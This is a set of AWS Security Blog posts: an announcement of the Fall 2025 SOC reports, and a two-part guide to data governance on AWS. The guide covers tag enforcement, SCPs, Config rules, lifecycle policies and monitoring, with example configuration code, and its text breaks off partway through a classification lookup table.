
Fall 2025 SOC 1, 2, and 3 reports are now available with 185 services in scope

20 January 2026 at 20:48

Amazon Web Services (AWS) is pleased to announce that the Fall 2025 System and Organization Controls (SOC) 1, 2, and 3 reports are now available. The reports cover 185 services over the 12-month period from October 1, 2024, to September 30, 2025, giving customers a full year of assurance. These reports demonstrate our continued commitment to meeting the heightened expectations for cloud service providers.

Customers can download the Fall 2025 SOC 1 and 2 reports through AWS Artifact, a self-service portal for on-demand access to AWS compliance reports. Sign in to AWS Artifact in the AWS Management Console, or learn more at Getting Started with AWS Artifact. The SOC 3 report can be found on the AWS SOC Compliance Page.

AWS strives to continuously bring services into the scope of its compliance programs to help customers meet their architectural and regulatory needs. You can view the current list of services in scope on our Services in Scope page. As an AWS customer, you can reach out to your AWS account team if you have any questions or feedback about SOC compliance.

To learn more about AWS compliance and security programs, see AWS Compliance Programs. As always, we value feedback and questions; reach out to the AWS Compliance team through the Contact Us page.

If you have feedback about this post, submit comments in the Comments section below.

Tushar Jain
Tushar is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Tushar holds a Master of Business Administration from the Indian Institute of Management Shillong, India, and a Bachelor of Technology in electronics and telecommunication engineering from Marathwada University, India. He has over 13 years of experience in information security and holds CISM, CCSK, and CSXF certifications.

Michael Murphy
Michael is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Michael has over 14 years of experience in information security and holds a master's degree and a bachelor's degree in computer engineering from Stevens Institute of Technology. He also holds CISSP, CRISC, CISA, and CISM certifications.

Nathan Samuel
Nathan is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Nathan has a Bachelor of Commerce degree from the University of the Witwatersrand, South Africa, and has over 21 years of experience in security assurance. He holds the CISA, CRISC, CGEIT, CISM, CDPSE, and Certified Internal Auditor certifications.

Gabby Iem
Gabby is a Program Manager at AWS. She supports multiple initiatives within AWS security assurance and recently received her bachelor's degree in business administration from Chapman University.

Jeff Cheung
Jeff is a Technical Program Manager at AWS where he leads multiple security and privacy initiatives across business lines. Jeff has bachelor's degrees in Information Systems and Economics from SUNY Stony Brook and has over 20 years of experience in information security and assurance. Jeff has held professional certifications such as CISA, CISM, and PCI-QSA.

Noah Miller
Noah is a Compliance Program Manager at AWS and supports multiple security and privacy initiatives within AWS. Noah has 6 years of experience in information security. He has a master's degree in Cybersecurity Risk Management and a bachelor's degree in Informatics from Indiana University.

Will Black
Will is a Compliance Program Manager at Amazon Web Services where he leads multiple security and compliance initiatives. Will has 10 years of experience in compliance and security assurance and holds a degree in Management Information Systems from Temple University. Additionally, he is a PCI Internal Security Assessor (ISA) for AWS and holds the CCSK and ISO 27001 Lead Implementer certifications.

Implementing data governance on AWS: Automation, tagging, and lifecycle strategy – Part 2

16 January 2026 at 21:26

In Part 1, we explored the foundational strategy, including data classification frameworks and tagging approaches. In this post, we examine the technical implementation approach and key architectural patterns for building a governance framework.

We explore governance controls across four implementation areas, building from foundational monitoring to advanced automation. Each area builds on the previous one, so you can implement incrementally and validate as you go:

  • Monitoring foundation: Begin by establishing your monitoring baseline. Set up AWS Config rules to track tag compliance across your resources, then configure Amazon CloudWatch dashboards to provide real-time visibility into your governance posture. By using this foundation, you can understand your current state before implementing enforcement controls.
  • Preventive controls: Build proactive enforcement by deploying AWS Lambda functions that validate tags at resource creation time. Implement Amazon EventBridge rules to trigger real-time enforcement actions and configure service control policies (SCPs) to establish organization-wide guardrails that prevent non-compliant resource deployment.
  • Automated remediation: Reduce manual intervention by setting up AWS Systems Manager Automation Documents that respond to compliance violations. Configure automated responses that correct common issues like missing tags or improper encryption and implement classification-based security controls that automatically apply appropriate protections based on data sensitivity.
  • Advanced features: Extend your governance framework with sophisticated capabilities. Deploy data sovereignty controls to help ensure regulatory compliance across AWS Regions, implement intelligent lifecycle management to optimize costs while maintaining compliance, and establish comprehensive monitoring and reporting systems that provide stakeholders with clear visibility into your governance effectiveness.

Prerequisites

Before beginning implementation, ensure you have the AWS Command Line Interface (AWS CLI) installed and configured with appropriate credentials for your target accounts. Set AWS Identity and Access Management (IAM) permissions so that you can create roles, Lambda functions, and AWS Config rules. Finally, basic familiarity with AWS CloudFormation or Terraform will be helpful, because we'll use CloudFormation throughout our examples.

Tag governance controls

Implementing tag governance requires multiple layers of controls working together across AWS services. These controls range from preventive measures that validate resources at creation to detective controls that monitor existing resources. This section describes each control type, starting with preventive controls, which act as the first line of defense.

Preventive controls

Preventive controls help ensure resources are properly tagged at creation time. By implementing Lambda functions triggered by AWS CloudTrail events, you can validate tags before resources are created, preventing non-compliant resources from being deployed:

# AWS Lambda function for preventive tag enforcement
def enforce_resource_tags(event, context):
    required_tags = ['DataClassification', 'DataOwner', 'Environment']

    # Extract resource tags from the CloudTrail event
    resource_tags = event['detail']['requestParameters'].get('Tags', {})

    # Validate that all required tags are present
    missing_tags = [tag for tag in required_tags if tag not in resource_tags]

    if missing_tags:
        # Send alert to security team
        # Log non-compliance for compliance reporting
        raise Exception(f"Missing required tags: {missing_tags}")

    return {'status': 'compliant'}

For a complete, production-ready implementation, see Implementing Tag Policies with AWS Organizations and EventBridge event patterns for resource monitoring.

Organization-wide policy enforcement

AWS Organizations tag policies provide a foundation for consistent tagging across your organization. These policies define standard tag formats and values, helping to ensure consistency across accounts:

{
    "tags": {
        "DataClassification": {
            "tag_key": {
                "@@assign": "DataClassification"
            },
            "tag_value": {
                "@@assign": ["L1", "L2", "L3"]
            },
            "enforced_for": {
                "@@assign": [
                    "s3:bucket",
                    "ec2:instance",
                    "rds:db",
                    "dynamodb:table"
                ]
            }
        }
    }
}

For detailed implementation guidance, see Getting started with tag policies and Best practices for using tag policies.
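
The allowed-values constraint in this tag policy can be illustrated with a small local sketch. This is plain Python for demonstration, not the AWS Organizations service; the function and variable names are illustrative:

```python
# Minimal local sketch (not an AWS API): check resource tags against the
# allowed values defined in the tag policy above. The dict mirrors the
# "tag_value" @@assign list for DataClassification.
ALLOWED_VALUES = {"DataClassification": ["L1", "L2", "L3"]}

def tag_policy_violations(tags):
    """Return (key, value) pairs whose values violate the policy."""
    violations = []
    for key, allowed in ALLOWED_VALUES.items():
        value = tags.get(key)
        if value is not None and value not in allowed:
            violations.append((key, value))
    return violations

print(tag_policy_violations({"DataClassification": "Public"}))  # non-compliant value
print(tag_policy_violations({"DataClassification": "L2"}))      # compliant
```

The real tag policy evaluation also handles case sensitivity and inheritance across organizational units, which this sketch omits.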

Tag-based access control

Tag-based access control gives you fine-grained permissions using attribute-based access control (ABAC). By using this approach, you can define permissions based on resource attributes rather than creating individual IAM policies for each use case:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:PutObject"],
            "Resource": "*",
            "Condition": {
                "StringEquals": {
                    "aws:ResourceTag/DataClassification": "L1",
                    "aws:ResourceTag/Environment": "Prod"
                }
            }
        }
    ]
}
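
To see how this condition gates access, here is a simplified local model of the StringEquals evaluation. This is an illustration only, not the IAM policy engine:

```python
# Simplified sketch of how the StringEquals condition above gates access:
# access is allowed only when every condition key matches the resource's
# tag value exactly. Not the actual IAM policy engine.
def condition_matches(string_equals, resource_tags):
    for cond_key, expected in string_equals.items():
        # Condition keys look like "aws:ResourceTag/<TagKey>"
        tag_key = cond_key.split("/", 1)[1]
        if resource_tags.get(tag_key) != expected:
            return False
    return True

condition = {
    "aws:ResourceTag/DataClassification": "L1",
    "aws:ResourceTag/Environment": "Prod",
}
print(condition_matches(condition, {"DataClassification": "L1", "Environment": "Prod"}))  # True
print(condition_matches(condition, {"DataClassification": "L2", "Environment": "Prod"}))  # False
```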

Multi-account governance strategy

While implementing tag governance within a single account is straightforward, most organizations operate in a multi-account environment. Implementing consistent governance across your organization requires additional controls:

# This SCP prevents creation of resources without required tags
OrganizationControls:
  SCPPolicy:
    Type: AWS::Organizations::Policy
    Properties:
      Content:
        Version: "2012-10-17"
        Statement:
          - Sid: EnforceTaggingOnResources
            Effect: Deny
            Action:
              - "ec2:RunInstances"
              - "rds:CreateDBInstance"
              - "s3:CreateBucket"
            Resource: "*"
            Condition:
              'Null':
                'aws:RequestTag/DataClassification': true
                'aws:RequestTag/Environment': true

For more information, see the implementation guidance for SCPs.
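
The Null condition in this SCP denies the request when a required tag key is absent. A minimal local sketch of that logic, for illustration only:

```python
# Local sketch of the SCP's Null condition: a request is denied when any
# required tag key is missing from the request's tags (Null == true).
# Illustrative only; the actual evaluation is done by AWS Organizations.
REQUIRED_REQUEST_TAGS = ["DataClassification", "Environment"]

def scp_denies_request(request_tags):
    """Mirror the Deny statement: deny if any required tag key is missing."""
    return any(key not in request_tags for key in REQUIRED_REQUEST_TAGS)

print(scp_denies_request({"Environment": "Prod"}))  # True: DataClassification missing
print(scp_denies_request({"DataClassification": "L2", "Environment": "Prod"}))  # False
```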

Integration with on-premises governance frameworks

Many organizations maintain existing governance frameworks for their on-premises infrastructure. Extending these frameworks to AWS requires careful integration and applicability analysis. The following example shows how to use AWS Service Catalog to create a portfolio of AWS resources that align with your on-premises governance standards.

# AWS Service Catalog portfolio for on-premises aligned resources
ServiceCatalogIntegration:
  Portfolio:
    Type: AWS::ServiceCatalog::Portfolio
    Properties:
      DisplayName: Enterprise-Aligned Resources
      Description: Resources that comply with existing governance framework
      ProviderName: Enterprise IT

  # Product that maintains on-prem naming conventions and controls
  CompliantProduct:
    Type: AWS::ServiceCatalog::CloudFormationProduct
    Properties:
      Name: Compliant-Resource-Bundle
      Owner: Enterprise Architecture
      Tags:
        - Key: OnPremMapping
          Value: "EntArchFramework-v2"

Automating security controls based on classification

After data is classified, use these classifications to automate security controls. Use AWS Config to track and validate that resources are properly tagged through rules that assess your AWS resource configurations, including the built-in required-tags rule. For non-compliant resources, you can use Systems Manager to automate remediation.
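
As a sketch of how the managed required-tags rule is parameterized, the following helper builds an InputParameters payload of tagNKey/tagNValue pairs. The tag keys and values shown are assumptions for illustration:

```python
import json

# Sketch: build the InputParameters payload for the AWS Config managed
# required-tags rule, which accepts tagNKey/tagNValue parameter pairs.
# The tag keys and allowed values below are illustrative.
def required_tags_parameters(tag_specs):
    """tag_specs: list of (key, comma-separated allowed values or None)."""
    params = {}
    for i, (key, values) in enumerate(tag_specs, start=1):
        params[f"tag{i}Key"] = key
        if values:
            params[f"tag{i}Value"] = values
    return json.dumps(params)

print(required_tags_parameters([
    ("DataClassification", "L1,L2,L3"),
    ("DataOwner", None),
]))
```

The resulting JSON string is what you would supply as the rule's InputParameters when creating it through CloudFormation or the AWS CLI.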

With proper tagging in place, you can implement automated security controls using EventBridge and Lambda. By using this combination, you can create a cost-effective and scalable infrastructure for enforcing security policies based on data classification. For example, when a resource is tagged as high impact, you can use EventBridge to trigger a Lambda function to enable required security measures.

def apply_security_controls(event, context):
    resource_type = event['detail']['resourceType']
    tags = event['detail']['tags']

    # Use .get() so untagged resources don't raise a KeyError
    if tags.get('DataClassification') == 'L1':
        # Apply Level 1 security controls
        enable_encryption(resource_type)
        apply_strict_access_controls(resource_type)
        enable_detailed_logging(resource_type)
    elif tags.get('DataClassification') == 'L2':
        # Apply Level 2 security controls
        enable_standard_encryption(resource_type)
        apply_basic_access_controls(resource_type)

This example automation applies security controls consistently, reducing human error and maintaining compliance. Because the controls are defined in code, the protections applied always match your data classification levels.

Data sovereignty and residency

Data sovereignty and residency requirements help you comply with regulations like GDPR. You can implement controls that restrict data storage and processing to specific AWS Regions:

# Config rule for region restrictions
AWSConfig:
  ConfigRule:
    Type: AWS::Config::ConfigRule
    Properties:
      ConfigRuleName: s3-bucket-region-check
      Description: Checks if S3 buckets are in allowed regions
      Source:
        Owner: AWS
        SourceIdentifier: S3_BUCKET_REGION
      InputParameters:
        allowedRegions:
          - eu-west-1
          - eu-central-1

Note: This example uses eu-west-1 and eu-central-1 because these Regions are commonly used for GDPR compliance, providing data residency within the European Union. Adjust these Regions based on your specific regulatory requirements and business needs. For more information, see Meeting data residency requirements on AWS and Controls that enhance data residence protection.
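
The check this rule performs can be summarized in a few lines; the following sketch models it locally (illustrative only, not the Config rule itself):

```python
# Minimal local sketch of the region-restriction check performed by the
# Config rule above: a bucket is compliant only if it resides in an
# allowed Region. The Region list mirrors the GDPR-oriented example.
ALLOWED_REGIONS = {"eu-west-1", "eu-central-1"}

def evaluate_bucket_region(bucket_region):
    return "COMPLIANT" if bucket_region in ALLOWED_REGIONS else "NON_COMPLIANT"

print(evaluate_bucket_region("eu-central-1"))  # COMPLIANT
print(evaluate_bucket_region("us-east-1"))     # NON_COMPLIANT
```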

Disaster recovery integration with governance controls

While organizations often focus on system availability and data recovery, maintaining governance controls during disaster recovery (DR) scenarios is important for compliance and security. To implement effective governance in your DR strategy, start by using AWS Config rules to check that DR resources maintain the same governance standards as your primary environment:

AWSConfig:
  ConfigRule:
    Type: AWS::Config::ConfigRule
    Properties:
      ConfigRuleName: dr-governance-check
      Description: Ensures DR resources maintain governance controls
      Source:
        Owner: AWS
        SourceIdentifier: REQUIRED_TAGS
      Scope:
        ComplianceResourceTypes:
          - "AWS::S3::Bucket"
          - "AWS::RDS::DBInstance"
          - "AWS::DynamoDB::Table"
      InputParameters:
        tag1Key: "DataClassification"
        tag1Value: "L1,L2,L3"
        tag2Key: "Environment"
        tag2Value: "DR"

For your most critical data (classified as Level 1 in Part 1 of this series), implement cross-Region replication while maintaining strict governance controls. This helps ensure that sensitive data remains protected even during failover scenarios:

Cross-Region:
  ReplicationRule:
    Type: AWS::S3::Bucket
    Properties:
      ReplicationConfiguration:
        Role: !GetAtt ReplicationRole.Arn
        Rules:
          - Status: Enabled
            TagFilters:
              - Key: "DataClassification"
                Value: "L1"
            Destination:
              Bucket: !Sub "arn:aws:s3:::${DRBucket}"
              EncryptionConfiguration:
                ReplicaKmsKeyID: !Ref DRKMSKey

Automated compliance monitoring

By combining AWS Config for resource compliance, CloudWatch for metrics and alerting, and Amazon Macie for sensitive data discovery, you can create a robust compliance monitoring framework that automatically detects and responds to compliance issues:

Figure 1: Compliance monitoring architecture

This architecture (shown in Figure 1) demonstrates how AWS services work together to provide compliance monitoring:

  • AWS Config, CloudTrail, and Macie monitor AWS resources
  • CloudWatch aggregates monitoring data
  • Alerts and dashboards provide real-time visibility

The following CloudFormation template implements these controls:

Resources:
  EncryptionRule:
    Type: AWS::Config::ConfigRule
    Properties:
      ConfigRuleName: s3-bucket-encryption-enabled
      Source:
        Owner: AWS
        SourceIdentifier: S3_BUCKET_SERVER_SIDE_ENCRYPTION_ENABLED

  MacieJob:
    Type: AWS::Macie::ClassificationJob
    Properties:
      JobType: ONE_TIME
      S3JobDefinition:
        BucketDefinitions:
          - AccountId: !Ref AWS::AccountId
            Buckets:
              - !Ref DataBucket
        ScoreFilter:
          Minimum: 75

  SecurityAlarm:
    Type: AWS::CloudWatch::Alarm
    Properties:
      AlarmName: UnauthorizedAccessAttempts
      MetricName: UnauthorizedAPICount
      Namespace: SecurityMetrics
      Statistic: Sum
      Period: 300
      EvaluationPeriods: 1
      Threshold: 3
      AlarmActions:
        - !Ref SecurityNotificationTopic
      ComparisonOperator: GreaterThanThreshold

These controls provide real-time visibility into your security posture, automate responses to potential security events, and use Macie for sensitive data discovery and classification. For a complete monitoring setup, review List of AWS Config Managed Rules and Using Amazon CloudWatch dashboards.

Using AWS data lakes for governance

Modern data governance strategies often use data lakes to provide centralized control and visibility. AWS provides a comprehensive solution through the Modern Data Architecture Accelerator (MDAA), which you can use to help you rapidly deploy and manage data platform architectures with built-in security and governance controls. Figure 2 shows an MDAA reference architecture.

Figure 2: MDAA reference architecture

For detailed implementation guidance and source code, see Accelerate the Deployment of Secure and Compliant Modern Data Architectures for Advanced Analytics and AI.

Access patterns and data discovery

Understanding and managing access patterns is important for effective governance. Use CloudTrail and Amazon Athena to analyze access patterns:

SELECT
    useridentity.arn,
    eventname,
    requestparameters.bucketname,
    requestparameters.key,
    COUNT(*) AS access_count
FROM cloudtrail_logs
WHERE eventname IN ('GetObject', 'PutObject')
GROUP BY 1, 2, 3, 4
ORDER BY access_count DESC
LIMIT 100;

This query helps identify frequently accessed data and unusual patterns in access behavior. These insights help you to:

  • Optimize storage tiers based on access frequency
  • Refine DR strategies for frequently accessed data
  • Identify potential security risks through unusual access patterns
  • Fine-tune data lifecycle policies based on usage patterns
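
As one way to act on these insights, the following sketch maps access counts from the query to candidate S3 storage classes. The thresholds are assumptions for illustration, not AWS guidance:

```python
# Illustrative sketch: map access counts from the Athena query to candidate
# S3 storage classes. Thresholds are assumed values for demonstration.
def suggest_storage_class(access_count):
    if access_count >= 100:
        return "STANDARD"
    if access_count >= 10:
        return "STANDARD_IA"
    return "GLACIER"

# Hypothetical rows from the access-pattern query
rows = [("s3://logs/app.log", 250), ("s3://archive/2019.csv", 2)]
for key, count in rows:
    print(key, suggest_storage_class(count))
```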

For sensitive data discovery, consider integrating Macie to automatically identify and protect PII across your data estate.

Machine learning model governance with SageMaker

As organizations advance in their data governance journey, many are deploying machine learning models in production, necessitating governance frameworks that extend to machine learning (ML) operations. Amazon SageMaker offers advanced tools that you can use to maintain governance over ML assets without impeding innovation.

SageMaker governance tools work together to provide comprehensive ML oversight:

  • Role Manager provides fine-grained access control for ML roles
  • Model Cards centralize documentation and lineage information
  • Model Dashboard offers organization-wide visibility into deployed models
  • Model Monitor automates drift detection and quality control

The following example configures SageMaker governance controls:

# Basic ML governance setup with role and monitoring
SageMakerRole:
  Type: AWS::IAM::Role
  Properties:
    # Allow SageMaker to use this role
    AssumeRolePolicyDocument:
      Statement:
        - Effect: Allow
          Principal:
            Service: sagemaker.amazonaws.com
          Action: sts:AssumeRole
    # Attach necessary permissions
    ManagedPolicyArns:
      - arn:aws:iam::aws:policy/AmazonSageMakerFullAccess

ModelMonitor:
  Type: AWS::SageMaker::MonitoringSchedule
  Properties:
    # Set up hourly model monitoring
    MonitoringScheduleName: hourly-model-monitor
    ScheduleConfig:
      ScheduleExpression: 'cron(0 * * * ? *)'  # Run hourly

This example demonstrates two essential governance controls: role-based access management for secure service interactions and automated hourly monitoring for ongoing model oversight. While these technical implementations are important, remember that successful ML governance requires integration with your broader data governance framework, helping to ensure consistent controls and visibility across your entire data and analytics ecosystem. For more information, see Model governance to manage permissions and track model performance.

Cost optimization through automated lifecycle management

Effective data governance isn't just about security; it's also about managing costs efficiently. Implement intelligent data lifecycle management based on classification and usage patterns, as shown in Figure 3:

Figure 3: Tag-based lifecycle management in Amazon S3

Figure 3 illustrates how tags drive automated lifecycle management:

  • New data enters Amazon Simple Storage Service (Amazon S3) with the tag DataClassification: L2
  • Based on classification, the data starts in Standard/INTELLIGENT_TIERING
  • After 90 days, the data transitions to Amazon S3 Glacier storage for cost-effective archival
  • The RetentionPeriod tag (84 months) determines final expiration

Here's the implementation of the preceding lifecycle rules:

LifecycleConfiguration:
  Rules:
    - ID: IntelligentArchive
      Status: Enabled
      Transitions:
        - StorageClass: INTELLIGENT_TIERING
          TransitionInDays: 0
        - StorageClass: GLACIER
          TransitionInDays: 90
      Prefix: /data/
      TagFilters:
        - Key: DataClassification
          Value: L2
    - ID: RetentionPolicy
      Status: Enabled
      ExpirationInDays: 2555  # 7 years
      TagFilters:
        - Key: RetentionPeriod
          Value: "84"  # 7 years in months

S3 Lifecycle automatically optimizes storage costs while maintaining compliance with retention requirements. For example, data initially stored in S3 Intelligent-Tiering automatically moves to S3 Glacier after 90 days, significantly reducing storage costs while helping to ensure data remains available when needed. For more information, see Managing the lifecycle of objects and Managing storage costs with Amazon S3 Intelligent-Tiering.
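
The relationship between the RetentionPeriod tag (in months) and the rule's ExpirationInDays can be sketched with a small helper; using 365-day years matches the 84-month, 2,555-day example above:

```python
# Sketch: convert a RetentionPeriod tag value (months) into the
# ExpirationInDays value used by the lifecycle rule. Uses 365-day years
# and 30-day partial months, matching the 84-month / 2555-day example.
def retention_months_to_days(months):
    years, extra_months = divmod(months, 12)
    return years * 365 + extra_months * 30

print(retention_months_to_days(84))  # 2555
```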

Conclusion

Successfully implementing data governance on AWS requires both a structured approach and adherence to key best practices. As you progress through your implementation journey, keep these fundamental principles in mind:

  • Start with a focused scope and gradually expand. Begin with a pilot project that addresses high-impact, low-complexity use cases. By using this approach, you can demonstrate quick wins while building experience and confidence in your governance framework.
  • Make automation your foundation. Apply AWS services such as Amazon EventBridge for event-driven responses, implement automated remediation for common issues, and create self-service capabilities that balance efficiency with compliance. This automation-first approach helps ensure scalability and consistency in your governance framework.
  • Maintain continuous visibility and improvement. Regular monitoring, compliance checks, and framework updates are essential for long-term success. Use feedback from your operations team to refine policies and adjust controls as your organization's needs evolve.

Common challenges to be aware of:

  • Initial resistance to change from teams used to manual processes
  • Complexity in handling legacy systems and data
  • Balancing security controls with operational efficiency
  • Maintaining consistent governance across multiple AWS accounts and Regions

By following this approach and remaining mindful of potential challenges, you can build a robust, scalable data governance framework that grows with your organization while maintaining security, compliance, and efficient data operations.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Omar Ahmed
Omar Ahmed is an Auto and Manufacturing Solutions Architect who specializes in analytics. Omar's journey in cloud computing began as an AWS data center operations technician, where he developed hands-on infrastructure expertise. Outside of work, he enjoys motorsports, gaming, and swimming.
Omar Mahmoud
Omar is a Solutions Architect helping small and medium-sized businesses with their cloud journey. He specializes in Amazon Connect and next-gen developer services like Kiro. Omar began at AWS as a data center operations technician, gaining hands-on cloud infrastructure experience. Outside work, Omar enjoys gaming, hiking, and soccer.
Changil Jeong
Changil Jeong is a Solutions Architect at Amazon Web Services (AWS) partnering with independent software vendor customers on their cloud transformation journey, with strong interests in security. He joined AWS as an SDE apprentice before transitioning to SA. He previously served in the U.S. Army as a financial and budgeting analyst and worked at a large IT consulting firm as a SaaS security analyst.
Paige Broderick
Paige Broderick is a Solutions Architect at Amazon Web Services (AWS) who works with enterprise customers to help them achieve their AWS objectives. She specializes in cloud operations, focusing on governance and using AWS to develop smart manufacturing solutions. Outside of work, Paige is an avid runner and is likely training for her next marathon.

Implementing data governance on AWS: Automation, tagging, and lifecycle strategy – Part 1

16 January 2026 at 21:26

Generative AI and machine learning workloads create massive amounts of data. Organizations need data governance to manage this growth and stay compliant. While data governance isn't a new concept, recent studies highlight a concerning gap: a Gartner study of 300 IT executives revealed that only 60% of organizations have implemented a data governance strategy, with 40% still in planning stages or uncertain where to begin. Furthermore, a 2024 MIT CDOIQ survey of 250 chief data officers (CDOs) found that only 45% identify data governance as a top priority.

Although most businesses recognize the importance of data governance strategies, regular evaluation is important to ensure these strategies evolve with changing business needs, industry requirements, and emerging technologies. In this post, we show you a practical, automation-first approach to implementing data governance on Amazon Web Services (AWS) through a strategic and architectural guide, whether you're starting from scratch or improving an existing framework.

In this two-part series, we explore how to build a data governance framework on AWS that's both practical and scalable. Our approach aligns with what AWS has identified as the core benefits of data governance:

  • Classify data consistently and automate controls to improve quality
  • Give teams secure access to the data they need
  • Monitor compliance automatically and catch issues early

In this post, we cover strategy, classification framework, and tagging governance: the foundation you need to get started. If you don't already have a governance strategy, we provide a high-level overview of AWS tools and services to help you begin. If you have a data governance strategy, the information in this post can assist you in evaluating its effectiveness and understanding how data governance is evolving with new technologies.

In Part 2, we explore the technical architecture and implementation patterns with conceptual code examples, and throughout both parts, you'll find links to production-ready AWS resources for detailed implementation.

Prerequisites

Before implementing data governance on AWS, you need the right AWS setup and buy-in from your teams.

Technical foundation

Start with a well-structured AWS Organizations setup for centralized management. Make sure AWS CloudTrail and AWS Config are enabled across accounts; you'll need these for monitoring and auditing. Your AWS Identity and Access Management (IAM) framework should already define roles and permissions clearly.

Beyond these services, you'll use several AWS tools for automation and enforcement. The AWS service quick reference table that follows lists everything used throughout this guide.

Organizational readiness

Successful implementation of data governance requires clear organizational alignment and preparation across multiple dimensions.

  • Define roles and responsibilities. Data owners classify data and approve access requests. Your platform team handles AWS infrastructure and builds automation, while security teams set controls and monitor compliance. Application teams then implement these standards in their daily workflows.
  • Document your compliance requirements. List the regulations you must follow: GDPR, PCI-DSS, SOX, HIPAA, or others. Create a data classification framework that aligns with your business risk. Document your tagging standards and naming conventions so everyone follows the same approach.
  • Plan for change management. Get executive support from leaders who understand why governance matters. Start with pilot projects to demonstrate value before rolling out organization-wide. Provide role-based training and maintain up-to-date governance playbooks. Establish feedback mechanisms so teams can report issues and suggest improvements.

Key performance indicators (KPIs) to monitor

To measure the effectiveness of your data governance implementation, track the following essential metrics and their target objectives.

  • Resource tagging compliance: Aim for 95%, measured through AWS Config rules with weekly monitoring, focusing on critical resources and sensitive data classifications.
  • Mean time to respond to compliance issues: Target less than 24 hours for critical issues, tracked using CloudWatch metrics with automated alerting for high-priority non-compliance events.
  • Reduction in manual governance tasks: Target a 40% reduction in the first year, measured through automated workflow adoption and remediation success rates.
  • Storage cost optimization based on data classification: Target a 15–20% reduction through intelligent tiering and lifecycle policies, monitored monthly by classification level.

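As a rough illustration of the first KPI, tagging compliance can be computed from rule-evaluation results. The sketch below uses hypothetical data; in a real setup, the evaluations would come from the AWS Config API (for example, `get_compliance_details_by_config_rule`).

```python
# Sketch: compute the resource-tagging compliance KPI from a list of
# evaluation results. The data here is hypothetical; in practice it
# would come from AWS Config compliance APIs.

def tagging_compliance(evaluations):
    """Return the percentage of resources whose tag check is COMPLIANT."""
    if not evaluations:
        return 0.0
    compliant = sum(1 for e in evaluations if e["compliance"] == "COMPLIANT")
    return round(100.0 * compliant / len(evaluations), 1)

evaluations = [
    {"resource": "arn:aws:s3:::finance-data", "compliance": "COMPLIANT"},
    {"resource": "arn:aws:s3:::scratch-bucket", "compliance": "NON_COMPLIANT"},
    {"resource": "arn:aws:ec2:us-east-1:111122223333:instance/i-0abc", "compliance": "COMPLIANT"},
    {"resource": "arn:aws:rds:us-east-1:111122223333:db:orders", "compliance": "COMPLIANT"},
]

score = tagging_compliance(evaluations)
print(f"Tagging compliance: {score}%  (target: 95%)")  # -> 75.0%
```

Tracking this number weekly, scoped to resources tagged with sensitive classifications, gives you the trend line the KPI calls for.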
With these technical and organizational foundations in place, you're ready to implement a sustainable data governance framework.

AWS services used in this guide: Quick reference

This implementation uses the following AWS services. Some are prerequisites, while others are introduced throughout the guide.

Category

Services

Description

Foundation

AWS Organizations

Multi-account management structure that enables centralized policy enforcement and governance across your entire AWS environment.

AWS Identity and Access Management (IAM)

Controls who can access what resources through roles, policies, and permissions: the foundation of your security model.

Monitoring and auditing

AWS CloudTrail

Records every API call made in your AWS accounts, creating a complete audit trail of who did what, when, and from where.

AWS Config

Continuously monitors resource configurations and evaluates them against rules you define (such as requiring that all S3 buckets be encrypted). When it finds resources that don't meet your rules, it flags them as non-compliant so you can fix them manually or automatically.

Amazon CloudWatch

Aggregates metrics, logs, and events from across AWS for real-time monitoring, dashboards, and automated alerting on governance non-compliance.

Automation and enforcement

Amazon EventBridge

Acts as a central notification system that watches for specific events in your AWS environment (such as when an S3 bucket is created) and automatically triggers actions in response (such as running a Lambda function to check whether it has the required tags). Think of it as an "if this happens, then do that" automation engine.

AWS Lambda

Runs your governance code (tag validation, security controls, remediation) in response to events without managing servers.

AWS Systems Manager

Automates operational tasks across your AWS resources. In governance, it's primarily used to automatically fix non-compliant resources. For example, if AWS Config detects an unencrypted database, Systems Manager can run a pre-defined script to enable encryption without manual intervention.

Data protection

Amazon Macie

Uses machine learning to automatically discover, classify, and protect sensitive data like personally identifiable information (PII) across your S3 buckets.

AWS Key Management Service (AWS KMS)

Manages encryption keys for protecting data at rest, essential for high-impact data classifications.

Analytics and insights

Amazon Athena

Serverless query service that analyzes data in Amazon S3 using SQL, which makes it well suited for querying CloudTrail logs to understand access patterns.

Standardization

AWS Service Catalog

Creates catalogs of pre-approved, governance-compliant resources that teams can deploy through self-service.

ML governance

Amazon SageMaker

Provides specialized tools for governing machine learning operations including model monitoring, documentation, and access control.

Understanding the data governance challenge

Organizations face complex data management challenges, from maintaining consistent data classification to ensuring regulatory compliance across their environments. Your strategy should maintain security, ensure compliance, and enable business agility through automation. While this journey can be complex, breaking it down into manageable components makes it achievable.

The foundation: Data classification framework

Data classification is a foundational step in cybersecurity risk management and data governance strategies. Organizations should use data classification to determine appropriate safeguards for sensitive or critical data based on their protection requirements. Following the National Institute of Standards and Technology (NIST) framework, data can be categorized based on the potential impact to the confidentiality, integrity, and availability of information systems:

  • High impact: Severe or catastrophic adverse effect on organizational operations, assets, or individuals
  • Moderate impact: Serious adverse effect on organizational operations, assets, or individuals
  • Low impact: Limited adverse effect on organizational operations, assets, or individuals

Before implementing controls, establishing a clear data classification framework is essential. This framework serves as the backbone of your security controls, access policies, and automation strategies. The following is an example of how a company subject to the Payment Card Industry Data Security Standard (PCI-DSS) might classify data:

  • Level 1 – Most sensitive data:
    • Examples: Financial transaction records, customer PCI data, intellectual property
    • Security controls: Encryption at rest and in transit, strict access controls, comprehensive audit logging
  • Level 2 – Internal use data:
    • Examples: Internal documentation, proprietary business information, development code
    • Security controls: Standard encryption, role-based access control
  • Level 3 – Public data:
    • Examples: Marketing materials, public documentation, press releases
    • Security controls: Integrity checks, version control

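One way to make a framework like this actionable is to encode it as a lookup table that tagging and remediation automation can consult. The following is an illustrative sketch only; the level names mirror the example above, and the specific control values are assumptions, not an AWS API or a prescribed mapping.

```python
# Sketch: encode the example PCI-DSS-oriented classification framework
# as a lookup table for automation. The levels mirror the example above;
# the control values are illustrative assumptions.

CLASSIFICATION_CONTROLS = {
    "L1": {  # Most sensitive data
        "encryption_at_rest": True,
        "encryption_in_transit": True,
        "audit_logging": "comprehensive",
        "access": "strict",
    },
    "L2": {  # Internal use data
        "encryption_at_rest": True,
        "encryption_in_transit": False,
        "audit_logging": "standard",
        "access": "role-based",
    },
    "L3": {  # Public data
        "encryption_at_rest": False,
        "encryption_in_transit": False,
        "audit_logging": "integrity-checks",
        "access": "public-read",
    },
}

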